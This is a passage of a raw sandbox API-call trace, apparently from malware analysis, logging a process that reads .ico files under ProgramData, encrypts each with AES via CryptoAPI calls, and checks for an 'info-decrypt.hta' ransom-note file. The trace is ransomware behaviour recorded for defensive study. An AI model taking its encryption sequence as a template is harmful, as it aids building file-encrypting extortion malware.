pbData=0x3756dc8*=0x1, dwFlags=0x0) returned 1 [0174.273] CryptSetKeyParam (hKey=0xb7f950, dwParam=0x1, pbData=0x3756d94, dwFlags=0x0) returned 1 [0174.273] CryptEncrypt (in: hKey=0xb7f950, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3756dd8*, pdwDataLen=0x691f268*=0xe3d0, dwBufLen=0xe3d0 | out: pbData=0x3756dd8*, pdwDataLen=0x691f268*=0xe3d0) returned 1 [0174.274] CryptEncrypt (in: hKey=0xb7f950, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x37651cc*, pdwDataLen=0x691f270*=0x0, dwBufLen=0x10 | out: pbData=0x37651cc*, pdwDataLen=0x691f270*=0x10) returned 1 [0174.275] CryptDestroyKey (hKey=0xb7f750) returned 1 [0174.275] CryptReleaseContext (hProv=0x66baa70, dwFlags=0x0) returned 1 [0174.275] CryptReleaseContext (hProv=0x66baa70, dwFlags=0x0) returned 1 [0174.275] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_pref.ico", nBufferLength=0x105, lpBuffer=0x691ece0, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_pref.ico", lpFilePart=0x0) returned 0x60 [0174.275] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f1d4) returned 1 [0174.275] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_pref.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_pref.ico"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0174.277] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691e010) returned 1 [0174.277] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_property.ico", nBufferLength=0x105, lpBuffer=0x691ee00, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_property.ico", lpFilePart=0x0) returned 0x64 [0174.277] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x691ee08, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\info-decrypt.hta", lpFilePart=0x0) returned 0x62 [0174.277] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f268) returned 1 [0174.277] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\info-decrypt.hta" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x691f2e4 | out: lpFileInformation=0x691f2e4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x21265660, ftCreationTime.dwHighDateTime=0x1d68bad, ftLastAccessTime.dwLowDateTime=0x21265660, ftLastAccessTime.dwHighDateTime=0x1d68bad, ftLastWriteTime.dwLowDateTime=0x21265660, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x155e)) returned 1 [0174.277] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f264) returned 1 [0174.277] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_property.ico", nBufferLength=0x105, lpBuffer=0x691ee08, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_property.ico", lpFilePart=0x0) returned 0x64 [0174.277] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f2b4) returned 1 [0174.277] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_property.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_property.ico"), fInfoLevelId=0x0, lpFileInformation=0x37661a8 | out: lpFileInformation=0x37661a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f0eca86, ftCreationTime.dwHighDateTime=0x1ca040c, ftLastAccessTime.dwLowDateTime=0x5f0eca86, ftLastAccessTime.dwHighDateTime=0x1ca040c, ftLastWriteTime.dwLowDateTime=0xc78c9009, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xebb8)) returned 1 [0174.277] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f2b0) returned 1 [0174.277] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_property.ico", nBufferLength=0x105, lpBuffer=0x691ecf4, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_property.ico", lpFilePart=0x0) returned 0x64 [0174.278] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f1e8) returned 1 [0174.278] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_property.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_property.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x5a0 [0174.278] GetFileType (hFile=0x5a0) returned 0x1 [0174.278] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f1e4) returned 1 [0174.278] GetFileType (hFile=0x5a0) returned 0x1 [0174.278] GetFileSize (in: hFile=0x5a0, lpFileSizeHigh=0x691f2f0 | out: lpFileSizeHigh=0x691f2f0*=0x0) returned 0xebb8 [0174.278] ReadFile (in: hFile=0x5a0, lpBuffer=0x3766450, nNumberOfBytesToRead=0xebb8, lpNumberOfBytesRead=0x691f29c, lpOverlapped=0x0 | out: lpBuffer=0x3766450*, lpNumberOfBytesRead=0x691f29c*=0xebb8, lpOverlapped=0x0) returned 1 [0175.295] CloseHandle (hObject=0x5a0) returned 1 [0175.295] CryptAcquireContextW (in: phProv=0x691f23c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x691f23c*=0x66baaf8) returned 1 [0175.296] CryptGenRandom (in: hProv=0x66baaf8, dwLen=0x10, pbBuffer=0x369727c | out: pbBuffer=0x369727c) returned 1 [0176.320] CryptImportKey (in: hProv=0x66baaf8, pbData=0x39136c4, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x691f20c | out: phKey=0x691f20c*=0xb7f510) returned 1 [0176.320] CryptContextAddRef (hProv=0x66baaf8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0176.320] CryptContextAddRef (hProv=0x66baaf8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0176.321] CryptDuplicateKey (in: hKey=0xb7f510, pdwReserved=0x0, dwFlags=0x0, phKey=0x691f1fc | out: phKey=0x691f1fc*=0xb7f250) returned 1 [0176.321] CryptContextAddRef (hProv=0x66baaf8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0176.321] CryptSetKeyParam (hKey=0xb7f250, dwParam=0x4, pbData=0x39137a4*=0x1, dwFlags=0x0) returned 1 [0176.321] CryptSetKeyParam (hKey=0xb7f250, dwParam=0x1, pbData=0x3913770, dwFlags=0x0) returned 1 [0176.321] CryptEncrypt (in: hKey=0xb7f250, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x39137b4*, pdwDataLen=0x691f268*=0xebc0, dwBufLen=0xebc0 | out: pbData=0x39137b4*, pdwDataLen=0x691f268*=0xebc0) returned 1 [0176.322] CryptEncrypt (in: hKey=0xb7f250, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3922398*, pdwDataLen=0x691f270*=0x0, dwBufLen=0x10 | out: pbData=0x3922398*, pdwDataLen=0x691f270*=0x10) returned 1 [0176.323] CryptDestroyKey (hKey=0xb7f510) returned 1 [0176.323] CryptReleaseContext (hProv=0x66baaf8, dwFlags=0x0) returned 1 [0176.323] CryptReleaseContext (hProv=0x66baaf8, dwFlags=0x0) returned 1 [0176.323] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_property.ico", nBufferLength=0x105, lpBuffer=0x691ece0, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_property.ico", lpFilePart=0x0) returned 0x64 [0176.324] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f1d4) returned 1 [0176.324] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_property.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_property.ico"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0176.325] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691e010) returned 1 [0176.326] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_queue.ico", nBufferLength=0x105, lpBuffer=0x691ee00, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_queue.ico", lpFilePart=0x0) returned 0x61 [0176.326] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x691ee08, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\info-decrypt.hta", lpFilePart=0x0) returned 0x62 [0176.326] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f268) returned 1 [0176.326] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\info-decrypt.hta" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x691f2e4 | out: lpFileInformation=0x691f2e4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x21265660, ftCreationTime.dwHighDateTime=0x1d68bad, ftLastAccessTime.dwLowDateTime=0x21265660, ftLastAccessTime.dwHighDateTime=0x1d68bad, ftLastWriteTime.dwLowDateTime=0x21265660, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x155e)) returned 1 [0176.326] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f264) returned 1 [0176.326] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_queue.ico", nBufferLength=0x105, lpBuffer=0x691ee08, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_queue.ico", lpFilePart=0x0) returned 0x61 [0176.326] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f2b4) returned 1 [0176.326] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_queue.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_queue.ico"), fInfoLevelId=0x0, lpFileInformation=0x392337c | out: lpFileInformation=0x392337c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f112be3, ftCreationTime.dwHighDateTime=0x1ca040c, ftLastAccessTime.dwLowDateTime=0x5f112be3, ftLastAccessTime.dwHighDateTime=0x1ca040c, ftLastWriteTime.dwLowDateTime=0xc7be8cbf, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xdff5)) returned 1 [0176.875] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f2b0) returned 1 [0176.875] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_queue.ico", nBufferLength=0x105, lpBuffer=0x691ecf4, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_queue.ico", lpFilePart=0x0) returned 0x61 [0176.875] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f1e8) returned 1 [0176.875] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_queue.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_queue.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x280 [0176.875] GetFileType (hFile=0x280) returned 0x1 [0176.875] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f1e4) returned 1 [0176.876] GetFileType (hFile=0x280) returned 0x1 [0176.876] GetFileSize (in: hFile=0x280, lpFileSizeHigh=0x691f2f0 | out: lpFileSizeHigh=0x691f2f0*=0x0) returned 0xdff5 [0176.876] ReadFile (in: hFile=0x280, lpBuffer=0x3662eb8, nNumberOfBytesToRead=0xdff5, lpNumberOfBytesRead=0x691f29c, lpOverlapped=0x0 | out: lpBuffer=0x3662eb8*, lpNumberOfBytesRead=0x691f29c*=0xdff5, lpOverlapped=0x0) returned 1 [0176.878] CloseHandle (hObject=0x280) returned 1 [0176.878] CryptAcquireContextW (in: phProv=0x691f23c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x691f23c*=0x66baaf8) returned 1 [0176.879] CryptGenRandom (in: hProv=0x66baaf8, dwLen=0x10, pbBuffer=0x3671574 | out: pbBuffer=0x3671574) returned 1 [0177.679] CryptImportKey (in: hProv=0x66baaf8, pbData=0x3701044, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x691f20c | out: phKey=0x691f20c*=0xb7f450) returned 1 [0177.679] CryptContextAddRef (hProv=0x66baaf8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0177.679] CryptContextAddRef (hProv=0x66baaf8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0177.679] CryptDuplicateKey (in: hKey=0xb7f450, pdwReserved=0x0, dwFlags=0x0, phKey=0x691f1fc | out: phKey=0x691f1fc*=0xb7f6d0) returned 1 [0177.679] CryptContextAddRef (hProv=0x66baaf8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0177.679] CryptSetKeyParam (hKey=0xb7f6d0, dwParam=0x4, pbData=0x3701124*=0x1, dwFlags=0x0) returned 1 [0177.679] CryptSetKeyParam (hKey=0xb7f6d0, dwParam=0x1, pbData=0x37010f0, dwFlags=0x0) returned 1 [0177.679] CryptEncrypt (in: hKey=0xb7f6d0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3701134*, pdwDataLen=0x691f268*=0xe000, dwBufLen=0xe000 | out: pbData=0x3701134*, pdwDataLen=0x691f268*=0xe000) returned 1 [0177.680] CryptEncrypt (in: hKey=0xb7f6d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x370f158*, pdwDataLen=0x691f270*=0x0, dwBufLen=0x10 | out: pbData=0x370f158*, pdwDataLen=0x691f270*=0x10) returned 1 [0177.681] CryptDestroyKey (hKey=0xb7f450) returned 1 [0177.681] CryptReleaseContext (hProv=0x66baaf8, dwFlags=0x0) returned 1 [0177.681] CryptReleaseContext (hProv=0x66baaf8, dwFlags=0x0) returned 1 [0177.681] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_queue.ico", nBufferLength=0x105, lpBuffer=0x691ece0, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_queue.ico", lpFilePart=0x0) returned 0x61 [0177.681] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f1d4) returned 1 [0177.681] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_queue.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_queue.ico"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0177.683] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691e010) returned 1 [0177.683] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_.ico", nBufferLength=0x105, lpBuffer=0x691ee00, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_.ico", lpFilePart=0x0) returned 0x5b [0177.683] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x691ee08, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\info-decrypt.hta", lpFilePart=0x0) returned 0x62 [0177.683] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f268) returned 1 [0177.683] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\info-decrypt.hta" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x691f2e4 | out: lpFileInformation=0x691f2e4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x21265660, ftCreationTime.dwHighDateTime=0x1d68bad, ftLastAccessTime.dwLowDateTime=0x21265660, ftLastAccessTime.dwHighDateTime=0x1d68bad, ftLastWriteTime.dwLowDateTime=0x21265660, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x155e)) returned 1 [0177.683] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f264) returned 1 [0177.683] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_.ico", nBufferLength=0x105, lpBuffer=0x691ee08, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_.ico", lpFilePart=0x0) returned 0x5b [0177.683] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f2b4) returned 1 [0177.684] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_.ico"), fInfoLevelId=0x0, lpFileInformation=0x371010c | out: lpFileInformation=0x371010c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f138d40, ftCreationTime.dwHighDateTime=0x1ca040c, ftLastAccessTime.dwLowDateTime=0x5f138d40, ftLastAccessTime.dwHighDateTime=0x1ca040c, ftLastWriteTime.dwLowDateTime=0xc7c0ee1d, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xec75)) returned 1 [0177.684] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f2b0) returned 1 [0177.684] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_.ico", nBufferLength=0x105, lpBuffer=0x691ecf4, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_.ico", lpFilePart=0x0) returned 0x5b [0177.684] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f1e8) returned 1 [0177.684] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x280 [0177.684] GetFileType (hFile=0x280) returned 0x1 [0177.684] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f1e4) returned 1 [0177.684] GetFileType (hFile=0x280) returned 0x1 [0177.684] GetFileSize (in: hFile=0x280, lpFileSizeHigh=0x691f2f0 | out: lpFileSizeHigh=0x691f2f0*=0x0) returned 0xec75 [0177.684] ReadFile (in: hFile=0x280, lpBuffer=0x3710364, nNumberOfBytesToRead=0xec75, lpNumberOfBytesRead=0x691f29c, lpOverlapped=0x0 | out: lpBuffer=0x3710364*, lpNumberOfBytesRead=0x691f29c*=0xec75, lpOverlapped=0x0) returned 1 [0177.734] CloseHandle (hObject=0x280) returned 1 [0177.735] CryptAcquireContextW (in: phProv=0x691f23c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x691f23c*=0x66bab80) returned 1 [0177.736] CryptGenRandom (in: hProv=0x66bab80, dwLen=0x10, pbBuffer=0x371f6a0 | out: pbBuffer=0x371f6a0) returned 1 [0179.208] CryptImportKey (in: hProv=0x66bab80, pbData=0x374ad20, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x691f20c | out: phKey=0x691f20c*=0xb7f550) returned 1 [0179.208] CryptContextAddRef (hProv=0x66bab80, pdwReserved=0x0, dwFlags=0x0) returned 1 [0179.208] CryptContextAddRef (hProv=0x66bab80, pdwReserved=0x0, dwFlags=0x0) returned 1 [0179.208] CryptDuplicateKey (in: hKey=0xb7f550, pdwReserved=0x0, dwFlags=0x0, phKey=0x691f1fc | out: phKey=0x691f1fc*=0xb7fa10) returned 1 [0179.208] CryptContextAddRef (hProv=0x66bab80, pdwReserved=0x0, dwFlags=0x0) returned 1 [0179.208] CryptSetKeyParam (hKey=0xb7fa10, dwParam=0x4, pbData=0x374ae00*=0x1, dwFlags=0x0) returned 1 [0179.209] CryptSetKeyParam (hKey=0xb7fa10, dwParam=0x1, pbData=0x374adcc, dwFlags=0x0) returned 1 [0179.209] CryptEncrypt (in: hKey=0xb7fa10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x374ae10*, pdwDataLen=0x691f268*=0xec80, dwBufLen=0xec80 | out: pbData=0x374ae10*, pdwDataLen=0x691f268*=0xec80) returned 1 [0179.210] CryptEncrypt (in: hKey=0xb7fa10, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3759ab4*, pdwDataLen=0x691f270*=0x0, dwBufLen=0x10 | out: pbData=0x3759ab4*, pdwDataLen=0x691f270*=0x10) returned 1 [0179.211] CryptDestroyKey (hKey=0xb7f550) returned 1 [0179.211] CryptReleaseContext (hProv=0x66bab80, dwFlags=0x0) returned 1 [0179.211] CryptReleaseContext (hProv=0x66bab80, dwFlags=0x0) returned 1 [0179.212] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_.ico", nBufferLength=0x105, lpBuffer=0x691ece0, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_.ico", lpFilePart=0x0) returned 0x5b [0179.212] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f1d4) returned 1 [0179.212] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_.ico"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0179.214] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691e010) returned 1 [0179.214] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_property.ico", nBufferLength=0x105, lpBuffer=0x691ee00, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_property.ico", lpFilePart=0x0) returned 0x63 [0179.214] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x691ee08, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\info-decrypt.hta", lpFilePart=0x0) returned 0x62 [0179.214] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f268) returned 1 [0179.214] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\info-decrypt.hta" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x691f2e4 | out: lpFileInformation=0x691f2e4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x21265660, ftCreationTime.dwHighDateTime=0x1d68bad, ftLastAccessTime.dwLowDateTime=0x21265660, ftLastAccessTime.dwHighDateTime=0x1d68bad, ftLastWriteTime.dwLowDateTime=0x21265660, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x155e)) returned 1 [0179.214] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f264) returned 1 [0179.214] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_property.ico", nBufferLength=0x105, lpBuffer=0x691ee08, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_property.ico", lpFilePart=0x0) returned 0x63 [0179.214] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f2b4) returned 1 [0179.214] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_property.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_property.ico"), 